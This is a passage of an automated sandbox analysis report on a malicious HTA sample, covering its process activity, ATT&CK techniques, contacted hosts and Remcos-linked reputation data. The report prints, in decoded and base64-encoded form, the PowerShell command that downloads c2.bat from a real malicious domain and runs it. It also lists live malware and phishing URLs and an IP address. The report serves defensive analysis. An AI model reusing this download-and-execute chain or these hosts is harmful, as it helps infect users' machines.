Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6231Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6936Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000002.00000002.1697987815.0000000007330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;https://candwfarmsllc.com/c2.bat='https://candwfarmsllc.com/c2.bat';C:\Users\asaol\AppData\Local\Temp\c2.bat=C:\Users\asaol\AppData\Local\Temp + '\c2.bat';Invoke-WebRequest -Uri https://candwfarmsllc.com/c2.bat -OutFile C:\Users\asaol\AppData\Local\Temp\c2.bat;Start-Process -FilePath C:\Users\asaol\AppData\Local\Temp\c2.bat -NoNewWindow
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Base64 decoded [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;https://candwfarmsllc.com/c2.bat='https://candwfarmsllc.com/c2.bat';C:\Users\asaol\AppData\Local\Temp\c2.bat=C:\Users\asaol\AppData\Local\Temp + '\c2.bat';Invoke-WebRequest -Uri https://candwfarmsllc.com/c2.bat -OutFile C:\Users\asaol\AppData\Local\Temp\c2.bat;Start-Process -FilePath C:\Users\asaol\AppData\Local\Temp\c2.bat -NoNewWindowJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -encodedcommand wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamga7aa0acgboahqadabwahmaogavac8aywbhag4azab3agyayqbyag0acwbsagwaywauagmabwbtac8aywayac4aygbhahqapqanaggadab0ahaacwa6ac8alwbjageabgbkahcazgbhahiabqbzagwababjac4aywbvag0alwbjadialgbiageadaanadsadqakaemaogbcafuacwblahiacwbcageacwbhag8ababcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaywayac4aygbhahqapqbdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acaagacsaiaanafwaywayac4aygbhahqajwa7aa0acgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaaaab0ahqacabzadoalwavagmayqbuagqadwbmageacgbtahmababsagmalgbjag8abqavagmamgauagiayqb0acaalqbpahuadabgagkabablacaaqwa6afwavqbzaguacgbzafwayqbzageabwbsafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabjadialgbiageadaa7aa0acgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcagmamgauagiayqb0acaalqboag8atgblahcavwbpag4azabvahca
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -encodedcommand wwboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0ae0ayqbuageazwblahiaxqa6adoauwblagmadqbyagkadab5afaacgbvahqabwbjag8abaagad0aiabbae4azqb0ac4auwblagmadqbyagkadab5afaacgbvahqabwbjag8ababuahkacablaf0aoga6afqababzadeamga7aa0acgboahqadabwahmaogavac8aywbhag4azab3agyayqbyag0acwbsagwaywauagmabwbtac8aywayac4aygbhahqapqanaggadab0ahaacwa6ac8alwbjageabgbkahcazgbhahiabqbzagwababjac4aywbvag0alwbjadialgbiageadaanadsadqakaemaogbcafuacwblahiacwbcageacwbhag8ababcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwaywayac4aygbhahqapqbdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acaagacsaiaanafwaywayac4aygbhahqajwa7aa0acgbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaaaab0ahqacabzadoalwavagmayqbuagqadwbmageacgbtahmababsagmalgbjag8abqavagmamgauagiayqb0acaalqbpahuadabgagkabablacaaqwa6afwavqbzaguacgbzafwayqbzageabwbsafwaqqbwahaarabhahqayqbcaewabwbjageababcafqazqbtahaaxabjadialgbiageadaa7aa0acgbtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhahmayqbvagwaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcagmamgauagiayqb0acaalqboag8atgblahcavwbpag4azabvahcaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		21
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://candwfarmsllc.com0%Avira URL Cloudsafe
https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat0%Avira URL Cloudsafe
https://candwfarmsllc.com0%Avira URL Cloudsafe
https://wdcp.microsoft.w0%Avira URL Cloudsafe
https://myguyapp.com/W2.pdf100%Avira URL Cloudphishing
https://candwfarmsllc.com/c2.bat=0%Avira URL Cloudsafe
https://candwfarmsllc.com/c2.bat100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
candwfarmsllc.com
193.26.115.39
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://candwfarmsllc.com/c2.batfalse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://candwfarmsllc.compowershell.exe, 00000002.00000002.1692750838.0000000004D65000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://candwfarmsllc.com/c2.bat=powershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://myguyapp.com/msword.zippowershell.exe, 00000002.00000002.1692750838.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1692750838.0000000004DBF000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://myguyapp.com/W2.pdfpowershell.exe, 00000002.00000002.1692750838.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1692750838.0000000004DBF000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000002.00000002.1692750838.00000000050D9000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://candwfarmsllc.compowershell.exe, 00000002.00000002.1692750838.0000000004DBF000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.1695910492.0000000005B48000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://wdcp.microsoft.wmshta.exe, 00000000.00000003.1700820649.0000000002B4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1700851809.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1708862080.0000000002B59000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1692750838.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.batpowershell.exe, 00000002.00000002.1692750838.0000000004C36000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            193.26.115.39
                            		candwfarmsllc.comNetherlands
                            		46261QUICKPACKETUSfalse

                            General Information

                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1589374
                            Start date and time:2025-01-12 03:43:06 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 44s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:c1.hta
                            Detection:MAL
                            Classification:mal64.evad.winHTA@4/3@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 5
                            • Number of non-executed functions: 6
                            Cookbook Comments:
                            • Found application associated with file extension: .hta

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.12.23.50, 13.107.246.45
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            21:43:57API Interceptor1x Sleep call for process: mshta.exe modified
                            21:43:58API Interceptor12x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            193.26.115.39c2.htaGet hashmaliciousRemcosBrowse
                              c2.htaGet hashmaliciousRemcosBrowse
                                c2.htaGet hashmaliciousRemcosBrowse
                                  c2.htaGet hashmaliciousRemcosBrowse
                                    RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                      c2.htaGet hashmaliciousRemcosBrowse
                                        9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                          c2.htaGet hashmaliciousRemcosBrowse
                                            c2.htaGet hashmaliciousRemcosBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              candwfarmsllc.comc2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              QUICKPACKETUSc2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              RFQ-20241230.pif.exeGet hashmaliciousRemcosBrowse
                                              • 173.211.106.233
                                              Suppliers_Data.pif.exeGet hashmaliciousRemcosBrowse
                                              • 173.211.106.233
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              c2.htaGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39
                                              https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                              • 172.82.129.154
                                              9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                              • 193.26.115.39

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0ehttp://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                              • 193.26.115.39
                                              https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              http://metamaeskloegin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                              • 193.26.115.39
                                              http://www.www-support-com.info/fmicode/code.phpGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              http://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                              • 193.26.115.39
                                              https://telegrams-mh.org/Get hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              http://www.fmilocation.help/fmicode/code.phpGet hashmaliciousUnknownBrowse
                                              • 193.26.115.39
                                              https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 193.26.115.39

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1336
                                              Entropy (8bit):5.415351548465897
                                              Encrypted:false
                                              SSDEEP:24:3xSWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NK3R8er8Hw/1TAn:oWSU4xympgv4RIoUP7mZ9tK8NWR8ej/O
                                              MD5:FE29EE1C57797C704DB2CF01D232D6E3
                                              SHA1:C05A3AC0E256D9FC6BF2EA1333CCACEE3C6A78AC
                                              SHA-256:57EB9436C06586DA72F4A3957C154730E2FDE6F812614F4B52507834FB7B6905
                                              SHA-512:D040AEB9817C50BAB013B9BC45E15F790A0B67BD911A441B842260CC81EBB3BDCA5733D184BF5D652B0D5B26921771D04D455F25BF81280FA656189FC3985A0F
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnl1fx4e.b2x.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sga5kkgf.5fu.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              Static File Info

                                              General

                                              File type:HTML document, ASCII text, with CRLF line terminators
                                              Entropy (8bit):4.134913097748058
                                              TrID:
                                              • HyperText Markup Language (12001/1) 40.67%
